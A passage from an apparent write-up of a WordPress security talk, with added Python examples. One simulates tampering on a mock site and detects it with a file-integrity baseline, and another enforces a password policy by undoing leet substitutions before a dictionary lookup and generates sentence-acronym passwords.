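    """Build a constructed mini WordPress tree, baseline it, tamper, and report."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data):
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)

        write("wp-config.php", b"<?php define('DB_NAME', 'wp');\n")
        write("wp-includes/functions.php", b"<?php function wp_example() {}\n")
        write("wp-content/themes/twentytwelve/footer.php", b"<?php wp_footer(); ?>\n")
        write("wp-content/cache/page.html", b"cached page\n")
        baseline = snapshot(root)

        # Changes of the kind an administrator would want flagged, plus cache
        # churn that should stay silent.
        write("wp-includes/functions.php",
              b"<?php function wp_example() {} /* core file edited */\n")
        write("wp-content/uploads/2012/09/x.php",
              b"<?php // PHP file where only images should live\n")
        os.remove(os.path.join(root, "wp-content", "themes",
                               "twentytwelve", "footer.php"))
        write("wp-content/cache/page.html", b"regenerated cache\n")
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

In a real deployment the baseline would be stored outside the web root (an attacker who can write to `wp-includes` can also rewrite a baseline kept beside it) and refreshed only after a deliberate update, which is exactly when slide 20's update routine runs.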
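Slides 23 and 24 give the password rules (at least twelve characters, not a dictionary word, and no reliance on number/letter substitutions) and the first-letters-of-a-sentence memorisation technique. The added Python example below, which is not code from the talk, turns both into checks: it builds the acronym password from a sentence, undoes common substitutions before looking a password up in a word list, and reports what is wrong. The word list is a constructed sample; a real check would use a large cracking dictionary.

```python
"""Password-policy check and sentence-acronym generator, as an added example.

Not code from the talk. The dictionary and the substitution map are
constructed samples; a real policy would load a full cracking word list.
"""
import re

MIN_LENGTH = 12

# Substitutions that cracking tools try routinely, mapped back to the letter
# they stand for so the dictionary lookup sees the underlying word.
LEET_MAP = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                          "5": "s", "7": "t", "@": "a", "$": "s", "!": "i"})

# Characters commonly tacked onto the ends of a word (years, punctuation).
EDGE_CHARS = "0123456789!#%^&*()_-+=.,;:?/|~"

# Constructed sample word list.
SAMPLE_DICTIONARY = {"password", "wordpress", "administrator",
                     "sydney", "letmein", "welcome"}


def normalize_substitutions(text: str) -> str:
    """Map leet-style characters back to letters and lowercase the result."""
    return text.translate(LEET_MAP).lower()


def check_password(pw: str, dictionary=SAMPLE_DICTIONARY):
    """Return a list of policy problems; an empty list means the password passes."""
    problems = []
    if len(pw) < MIN_LENGTH:
        problems.append("too short")
    core = pw.strip(EDGE_CHARS)  # drop a trailing year or punctuation
    if normalize_substitutions(core) in dictionary:
        problems.append("dictionary word")
    return problems


def acronym_password(sentence: str) -> str:
    """First character of each word, keeping the author's capitalisation."""
    words = re.findall(r"[A-Za-z0-9']+", sentence)
    return "".join(w[0] for w in words)


if __name__ == "__main__":
    sentence = "Jack and Jill went up the hill to fetch a pail of water"
    pw = acronym_password(sentence)
    print(pw, len(pw), check_password(pw))
    for candidate in ["P@ssw0rd2012", "W0rdPr3ss", "Sydney!"]:
        print(candidate, check_password(candidate))
```

The point of the normalisation step is the one slide 23 makes: `P@ssw0rd2012` is twelve characters long and contains digits and punctuation, yet after undoing the substitutions and dropping the year it is simply `password`, which any cracking tool tries first.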